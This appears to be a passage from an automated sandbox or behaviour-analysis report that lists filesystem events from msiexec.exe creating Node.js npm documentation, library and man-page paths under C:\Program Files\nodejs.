                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npx.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\folders.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\install.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\npm-shrinkwrap-json.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\npmrc.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\package-json.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\package-lock-json.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\config.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\dependency-selectors.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\developers.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\logging.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\orgs.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\package-spec.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\registry.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\removal.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\scope.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\scripts.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\workspaces.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\lib\index.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-access.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-adduser.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-audit.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-bugs.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-cache.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ci.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-completion.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-config.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-dedupe.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-deprecate.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-diff.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-dist-tag.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-docs.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-doctor.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-edit.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-exec.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explain.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explore.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-find-dupes.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-fund.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-help-search.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-help.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-hook.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-init.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-ci-test.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-test.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-link.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-login.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-logout.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ls.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-org.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-outdated.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-owner.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pack.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ping.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pkg.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-prefix.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-profile.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-prune.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-publish.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-query.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-rebuild.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-repo.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-restart.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-root.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-run-script.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-sbom.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-search.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-shrinkwrap.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-star.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-stars.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-start.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-stop.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-team.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-test.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-token.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-uninstall.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-unpublish.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-unstar.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-update.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-version.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-view.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-whoami.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npx.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\folders.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\install.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\npm-shrinkwrap-json.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\npmrc.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\package-json.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm\package-lock-json.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\config.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\dependency-selectors.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\developers.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\logging.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\orgs.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\package-spec.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\registry.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\removal.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\scope.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\scripts.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\workspaces.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\arborist-cmd.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\base-command.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\cli-entry.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\cli.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\lifecycle-cmd.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\npm.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\package-url-cmd.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\access.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\adduser.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\audit.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\bugs.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\cache.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ci.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\completion.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\config.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\dedupe.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\deprecate.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\diff.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\dist-tag.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\docs.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\doctor.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\edit.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\exec.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\explain.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\explore.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\find-dupes.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\fund.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\get.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\help-search.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\help.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\hook.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\init.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\install-ci-test.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\install-test.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\install.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\link.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ll.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\login.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\logout.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ls.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\org.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\outdated.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\owner.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\pack.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\ping.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\pkg.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\prefix.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\profile.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\prune.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\publish.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\query.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\rebuild.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\repo.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\restart.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\root.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\run-script.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\sbom.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\search.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\set.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\shrinkwrap.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\star.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\stars.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\start.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\stop.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\team.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\test.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\token.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\uninstall.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\unpublish.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\unstar.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\update.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\version.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\view.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\commands\whoami.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\es6
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\es6\validate-engines.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\audit-error.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\auth.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\cmd-list.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion.fish
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion.sh
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\did-you-mean.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\display.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\error-message.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\exit-handler.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\explain-dep.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\explain-eresolve.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\format-bytes.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\format-search-stream.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\get-identity.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\is-windows.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\log-file.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\log-shim.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\npm-usage.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url-prompt.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\otplease.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\ping.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\pulse-till-done.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\queryable.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\read-user-info.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\reify-finish.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\reify-output.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\replace-info.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\sbom-cyclonedx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\sbom-spdx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\tar.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\timers.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\update-notifier.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\validate-lockfile.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\web-auth.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion\installed-deep.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\utils\completion\installed-shallow.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\workspaces
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\workspaces\get-workspaces.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\lib\workspaces\update-workspaces.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-access.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-adduser.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-audit.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-bugs.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-cache.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-ci.1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\man\man1\npm-completion.1
